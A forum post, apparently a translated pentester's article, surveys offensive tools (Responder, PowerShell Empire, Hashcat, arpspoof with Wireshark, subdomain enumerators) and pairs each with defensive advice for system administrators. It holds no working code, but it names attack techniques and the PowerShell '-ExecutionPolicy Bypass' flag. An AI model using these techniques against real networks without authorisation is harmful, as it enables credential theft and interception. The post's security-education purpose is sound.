Hacker
Professional
- Messages
- 1,044
- Reaction score
- 812
- Points
- 113
- Let's try a typical hacker situation.
- On Friday afternoons, the hum of laptops is drowned out by rhythmic music from headphones connected to a smartphone. The hash found has not yet been hacked, and the computer where the entire process takes place has not been turned off since Tuesday morning. The second can of energy hit the edge of the trash can.
- The ironed casual business suit that you are forced to wear begins to constrain your breath, as frustration begins to form inside. There are several hours left before you need to inform the client about the results of your work, but there is no desire to appear in the office before the task is completely solved.
- Take a deep breath. It's time to put aside your work, go back to the beginning and try to look at the current situation from a new angle.
In the days of Backtrack and earlier versions of Kali Linux, the default desktop background image used to display the following slogan: "The quieter you get, the more you can hear" (which would have been better changed quickly, so as not to attract attention). It wasn't until I became a professional pentester that I realized the wisdom of this saying. Since technology is constantly evolving, once you have penetrated someone else's network, you must quickly understand how this network works. Unfortunately, most network and system administrators, like ordinary people, have habits, and to find something interesting and valuable, all we need to do is lie low and listen.
When it comes to penetration testing, there is a standoff between the two groups. On the one hand, the pentester wants to find a vulnerability, on the other-the system administrator wants to show that the system is resistant to cyber attacks. In some ways, this theme is similar to an amateur soccer competition sponsored by a beer hall pub. After the game, participants of both teams spend time in the bar, but the thirst for winning and success has not been canceled. The difference between football and pentest is that in a sports game, the rules are transparent, and all participants know about the strategy for achieving results.
There is no doubt that the task of the pentester is to safely simulate a legitimate threat in order to identify risks. However, without a thorough understanding of the situation, it is difficult to come up with a good medicine. Sun Tzu once said:
"If you don't know your opponent or yourself, you will lose every battle."
To protect the network from cyber threats, each administrator must be familiar not only with their own tools, but also with the tools of the enemy (at least at the information level). Being in the dark is not the best way to go.
Introduction
In this article, I will mainly try to answer the question "why", and touch on the answers to the question "how". There are countless videos and tutorials out there that teach you how to use the tools, and generally provide a lot more information than you can fit into a single article. In addition, I admit that other experts may have a different opinion about the mentioned utilities. The list given here is far from complete. If your opinion differs from mine, I will be happy to read your comments.
Now go directly to the description of the tools.
1. Responder
In my opinion, this utility is at the top of the list. When a researcher starts their work and starts talking about "limited functionality", this tool is the first thing that comes to mind. If you are a pentester, then after connecting to the network and starting to search for vulnerabilities, Responder is the first utility that you need to use. The essence of Responder is to listen for traffic and modify responses in the following protocols:
- Link-Local Multicast Name Resolution (LLMNR)
- NetBIOS Name Service (NBT-NS)
- Web Proxy Auto-Discovery (WPAD)
If you work as a system administrator, you may have heard something about these protocols, but you can't remember where they came from. You may have seen references to these concepts in Microsoft's training literature, which has long since lost relevance, or, depending on how long you have been in the topic, you may have configured these protocols.
The NBT-NS protocol is a relic of the past, left behind by Microsoft for compatibility purposes so that applications that use NetBIOS can run on TCP / IP networks. The LLMNR protocol is similar to DNS and relies on multicast peer-to-peer communications for name translation. This protocol appeared in the time of Windows Vista, which, as we understand, can not bode well. Even if you have never encountered any of the above concepts, these protocol packets are distributed over the network, which both real and fictional attackers are well aware of.
On the other hand, the WPAD protocol solves very specific tasks. Most corporate networks use automatic proxy server configuration (PAC) to control host access to the Internet. And WPAD makes this control relatively simple. Computers on the network send a broadcast message to search for the file used by the WPAD protocol and automatically configure the proxy. And it is at this point that malicious activity can occur.
Cybersecurity experts are well aware that most protocols that use broadcast and multicast communications in any form have vulnerabilities. If you look from the perspective of an attacker, one of the most common cases is account theft and hacking hashes obtained after initiating or reusing "handshakes".
Unfortunately, system administrators mostly pay attention to the endless list of tasks related to system health. For those who are particularly busy, there are simple methods of protecting themselves from such cyber threats, the essence of which is to disable the relevant protocols. To transfer a file associated with automatic proxy server configuration, you need to use more secure methods, such as group policies. I understand that the temptation to use automatic detection of settings is very great, but try to avoid this kind of chips.
2. PowerShell Empire
Before the Empire utility was widely available, pentesters used an infrastructure based on C2 servers, where the agent had to be located on disk. Subsequently, such developments became public domain, got into the Virus Total service, and then into antivirus databases. Of course, there were and still are ways to bypass antivirus programs, but such tricks are often associated with additional and very time-consuming dances with a tambourine. In fact, the confrontation between virus writers and antivirus companies was an endless game of cat and mouse. This was the case until the time when a method involving the use of fileless agents appeared on the horizon, which in many ways changed the rules of the game.
What happened can be compared to the collective subconscious of pentesters, who at one point came to the conclusion that the most advanced tools are already on all modern workstations around the world. It remains only to create a framework, which the Empire team did.
As a result, many frameworks and utilities used by pentesters during the operation and post-operation of breaches began to adapt to PowerShell. Of course, real attackers also could not avoid this topic.
If you look at this situation from the perspective of a system administrator, this fact means exactly one thing: some security measures can be easily circumvented. Agents, including malicious programs that don't use files, can be easily deployed using PowerShell. Such developments exist exclusively in memory, are not stored on the hard disk, and do not use USB (although this method is still working. These days, more and more malware bugs live exclusively in memory. At the end of this document, you will find a link to an article that covers this topic in more detail. As a result, most of the antivirus programs, whose functionality is sharpened for scanning files on disk, are becoming less effective. As a result, the focus begins to shift to finding the source of infection, which is often found in macros of frequently changing office files (Word/Excel).
The best way to protect against fileless malware is either Applocker or any other application that supports whitelisting programs. Of course, whitelisting may take some time and probably require the intervention of your company's management, but in general, workstation security is moving in this direction. Thus, using this technology, you will find yourself at the forefront of modern trends.
In addition, it is not superfluous to analyze how PowerShell is used on your system. Can regular users use this tool, and if so, why?
When it comes to preventing threats, let me immediately save you a lot of time. Restrictions related to the execution policy in PowerShell are easily circumvented (see the "-ExecutionPolicy Bypass " flag).
3. Hashcat and dictionaries
This sweet couple is on my list absolutely deservedly. Hacking hashes and recovering passwords is a fairly clear topic, so I won't spend much time on it.
Hashcat is a password cracker that allows you to work in conjunction with GPUs and supports many formats. It is usually used together with hashes obtained by the Responder utility. In addition to Hashcat, you must have a USB disk and several gigabytes of dictionaries. I use the dictionary search for passwords during each pentest, but there is one subtlety here. Since password cracking can take a long time, you should choose the best combination between the time spent and the expected result.
Pentesters, if you choose passwords using a single laptop, then this is the wrong approach. You need at least two. Plus a good GPU to increase the probability of success.
Sysadmins, make a revision of your policies and configurations. It is good practice to follow industry standards such as DISA STIG. Standards like DISA STIG support a variety of operating systems and software, and contain key configurations to protect against offline password cracking and replay attacks. This may also include password policies recommended by the National Institute of Standards and Technology( NIST), non-standard authentication schemes, and much more. The DISA standard even provides for group policy templates that can be imported and adapted to your needs, which saves you a lot of time. Still using NTLMv1? Passwords less than 8 characters long? Then know that your system is very vulnerable.
4. Tools for testing web applications
If you are a pentester, you will probably hear the truism again. For everyone else, I would like to say that web application testing tools and vulnerability scanners are not the same thing.
Undoubtedly, vulnerability scanners (Nessus, Nexpose, Retinatesting tools can have web application testing functionality, and testing tools can have scanner functions, but I still recommend avoiding universality and not using a single class of utilities in all cases. Testing tools are more focused on working at the application level, rather than at the level of services and protocols. Use this class of utilities to test pages in internal and external networks. On the other hand, vulnerability scanners are more suitable for testing and evaluating the security of ports, protocols, and services.
These days, many organizations are implementing enterprise web applications, intranet sites, and reporting systems. It is assumed that since the site is used exclusively for internal purposes, there is no need to conduct a security study of the code, and you can grant access to all users. This approach leads to the fact that sooner or later there are vulnerabilities that are suitable for exploitation.
Personally, during pentests, I first try to find obvious vulnerabilities related to incorrect configuration of services and hosts with outdated software. If the search is not successful, I go up a level and start testing the web application. Since this area is extremely vast, you can always find something incriminating. Here are some classes of gaps that are found most frequently::
- Stored Cross-site Scripting (XSS).
- SQL Injection.
- Authentication bypass.
- Directory traversal abuse.
- Unrestricted file upload.
Check out the OWASP project, which focuses entirely on secure application development. Analyze the Software Development Lifecycle (SDLC) to see if there are blocks associated with application security testing. The OWASP project provides some recommendationson this topic.
Check out two application testing methodologies:
- Static Application Security Testing (SAST)— The source code of the application must be available for analysis.
- Dynamic Application Security Testing— DAST)- Analysis of the application in its working state.
5. Arpspoof and Wireshark
At the beginning of the article, I mentioned that you need to look at the situation from a new angle. This bundle of utilities just explains what was meant.
Arpspoof allows the pentester to get between the victim and the gateway, and Wireshark allows you to intercept packets from the interface for later analysis. Roughly speaking, during a pentest, you redirect traffic from the victim (for example, from a workstation) and then analyze the content of the intercepted information. Sometimes it is enough to understand who is involved in the communication, and intercept some data in clear form to get something interesting.
From the moment the first theoretical concepts were presented, MiTM attacks (such as "man in the middle") they are still effective in modern networks. Given that the vast majority of internal networks currently use the IPv4 protocol (this state of affairs will not change soon) and the architecture of the ARP protocol, this MiTM attack will remain relevant.
Many people mistakenly assume that if communications take place inside the network, this fact guarantees security, and there is no need to use encryption inside subnets. Even if your network is located outside the Internet, no one can guarantee that an attacker will not be able to get in from the outside and connect to your communications.
Using the same paradigm, we can assume that the workstation will be compromised by an attacker from another country using a Trojan that allows you to carry out a MiTM attack. An alternative and more realistic scenario involves an insider threat. For example, an employee who has technical knowledge and not very pure thoughts, got acquainted with several videos on Youtube and decided to approach the secretary, who suddenly" suddenly " broke out sympathies. Insider-related threats are relevant, especially in organizations whose leaders are well-known and very rich. Remember that envy often pushes people to do rash things.
Now let's talk about security methods.
Encrypt communications even on internal networks. It is a mistake to assume that communications within the network are protected simply because the gateway is not connected to the Internet. All client-server applications should encrypt their communications whenever possible.
VLAN segments must be properly designed, and the entire network must be protected from unauthorized devices. You may need to implement a Network Access Control (NAC) system or the 802.1 X standard. Disable unused ports and think about Sticky MAC addresses if you're on a tight budget.
Have you ever thought about testing an IDS system? There are even free and open-source options that allow you to evaluate performance. For example, Security Onion. The rules of IDS systems are designed to detect abnormal network activity, which, for example, may indicate an attempt to implement an attack related to ARP cache poisoning (ARP poisoning). Try to implement such tools if you have the necessary resources and, of course, the approval of your superiors. As a trial step, you can also try out the Honeypot systems. Open source options are also available here. For example, Honeyd.
Subdomain numerators
Subdomain enumerators I decided to highlight it separately, since this topic does not fully overlap with any of the above utilities, but it deserves consideration. If you're reading the r/netsec feed, you've probably noticed that a lot of subdomain enumerators and bruteforcers have appeared recently.
Why is this topic relevant?
Regardless of who is trying to break into your network, whether a hired pentester or an attacker, intelligence takes 80% of the time, and usually the first step is to search through subdomains. An attacker doesn't even need to touch your system to understand the points of contact with the World Wide Web. Utilities like Fierce make this work much easier.
Sysadmins, if I asked you how much your system is visible from the Internet, would you be able to answer this question? What ports and protocols are available from the wild? Are web consoles available? Run a Whois database search for the main domain used by your organization and registered with a popular registrar (Network Solutions, GoDaddy, etc.). Use the search results to analyze the names, postal and email addresses you received. If the list includes real names and addresses, then this information may already be enough for attackers. For example, you can use the Shodan search engine to find all available devices. Enter external IP addresses in the search engine and take a look at the results that are available to everyone.
I'll give you an example. If you're a system administrator and don't know Phineas Fisher, I wouldn't be surprised. But if you're a pentester and you don't know who that person is, then you should be ashamed of yourself.
In 2016, the Milan-based Hacking Team was known as a manufacturer of cyber weapons for governments around the world. These friends were hacked by a person under the pseudonym listed above. As a result, a huge amount of data was leaked, and one of the most detailed articles on real hacking appeared. Take a look at Step 2 mentioned in that note, which is called "Subdomain Enumeration". I will not comment on the ethics of this exercise, but regardless of which side you are on, the details described by Thomas Fischer are of great value to security professionals and system administrators and allow them to understand how an attacker thinks.
Sun Tzu said the following:
"If you know the enemy and yourself, you don't have to worry about the outcome of a hundred battles."
